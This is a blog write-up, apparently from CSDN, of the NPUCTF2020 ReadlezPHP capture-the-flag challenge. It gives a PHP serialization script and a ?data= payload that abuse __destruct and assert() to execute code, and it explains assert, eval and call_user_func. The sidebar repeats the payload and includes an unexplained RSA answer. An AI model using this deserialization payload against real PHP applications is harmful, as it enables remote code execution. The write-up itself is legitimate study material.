[NPUCTF2020]ReadlezPHP 1

于 2022-03-21 20:55:28 发布
阅读量1.5k 收藏 3
点赞数 1
分类专栏: BUUCTF 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/123645334
版权 
知识点:assert和eval的不同   call_user_func   回调函数

分析

ctrl+u看源码
在这里插入图片描述
这题应该是要构造序列化来通过echo $b($a);拿flag,不过flag在phpinfo里我是真没想到。
在这里插入图片描述

payload

序列化:

<?php
#error_reporting(0);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "phpinfo()";
        $this->b = "assert";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
$c = new HelloPhp;

@$ppp = serialize($c);
echo $ppp;
?>

?data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}

或者用call_user_func(phpinfo)

原理及不同:

PHP assert 和 eval不同

assert()可以将整个字符串参数当作php参数执行,
而类似的eval()函数是执行合法的php代码,eval()里的引号必须是双引号,因为单引号不能解析字符串里的变量$str,且必须以分号结尾,函数调用除外。

例如:
这样是不行的。

<?php
echo eval(echo 1);
?>

这样就可以了。

<?php
echo eval("echo 1;");
?>

注意:assert把整个字符串参数当php代码执行,eval把合法的php代码执行。

call_user_func把第一个参数当作回调函数使用。
回调函数:把一个函数当作作为外层函数的参数,相当于把函数嵌入到外层函数中。

实例1:
实例2:

//普通函数
function f1($param1,$param2)
{
 echo '函数'.__FUNCTION__.'被执行,传入的参数是:'.$param1.' '.$param2;
 echo "<br/>";
}
//通过call_user_func调用函数f1
call_user_func('f1','han','wen');
//通过call_user_func_array调用函数
call_user_func_array('f1',array('han','wen'));

函数f1被执行,传入的参数是:han wen
函数f1被执行,传入的参数是:han wen

succ3
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[NPUCTF2020]ReadlezPHP 1[b(a)]
weixin_45577185的博客
10-16 143
f12发现了令一个网页,打开 发现代码,开始审计 __destruct()魔术方法: 属性b包裹住属性a 利用assert()函数 assert 判断一个表达式是否成立 assert()可以将整个字符串参数当作php参数执行。 构造反序列化 由b(a)可以构造b=assert,a=phpinfo ->assert(phpinfo()) 反序列化构造 payload:?data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert"
[NPUCTF2020]ReadlezPHP
missht0的博客
01-30 273
[NPUCTF2020]ReadlezPHP 在源码里面搜索php,搜到一个 访问后是源码 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } public function __de
[NPUCTF2020]Baby Obfuscation.exe.i64
06-02
Baby Obfuscation分析过程
解读“模块的沟通”
08-04
例如,如果模块A在时钟上升沿将信号Done设置为1,模块B不能立即在同一个时钟周期内检测到Done信号的变化,而是在下一个时钟周期才能看到Done信号为1。 下面通过一个具体的例子来进一步阐述这个问题: 假设我们有两...
flash涂鸦板
12-10
简单易操作 一木了然 而且能让你快速体验到FLASH的操作乐趣 让你有想去学的冲动 而且能让你快速掌握简单操作
obfuscation
05-11
obfuscation 基于Allatori的Java代码混淆工具 使用Allatori混淆工具写的一个Maven插件 mvn install此项目,然后在想要混淆的项目的pom文件中引入此插件,并指定配置文件全路径以及要混淆的类所在路径即可使用 ...
buuctf-web-[NPUCTF2020]ReadlezPHP
weixin_46079186的博客
07-20 273
打开题目,想查看源码发现不能右键肯定有东西,f12 查看 找到一个链接 打开拿到源代码,看样子是个反序列化 关键代码 调用_destruct函数执行echo \$b(\$a),利用这个函数执行任意我们想执行的函数 $a = $this->a; $b = $this->b; echo $b($a); 构造参数 <?php class HelloPhp { public $a; public $b; } $c = new HelloPhp; $c->b .
从以下代码中找到被藏起来的e,提示:在代码注释中。from Crypto.Util.number import * from gmpy2 import * from secret import flag p = getPrime(25) e = # Hidden q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ''' 169169912654178 128509160179202 518818742414340 358553002064450
最新发布
07-16
根据提示,在代码注释中可以找到隐藏的 `e` 值。以下是给定代码的修改版本,以显示隐藏的 `e` 值: ```python from Crypto.Util.number import * from gmpy2 import * from secret import flag p = getPrime(25) # Hidden e = 65537 q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ``` 在修改后的代码中,我们将 `e` 的值设置为 65537。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值